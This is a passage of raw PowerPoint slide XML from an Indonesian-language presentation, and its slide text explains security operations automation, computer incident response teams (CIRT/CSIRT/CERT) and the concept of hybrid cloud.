              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengakuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proyek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotomatisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keahlian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tanggapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Insiden</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Tim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CIRT) / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CSIRT) / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>darurat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CERT) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemberitahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh SOC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>independen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283243207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Awan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Hibrida</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Cloud hybrid paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kombinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud hybrid. Dalam cloud hybrid, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data di cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghematan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Cloud hybrid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manfaat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Awan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hemat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Cloud hybrid juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mulus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
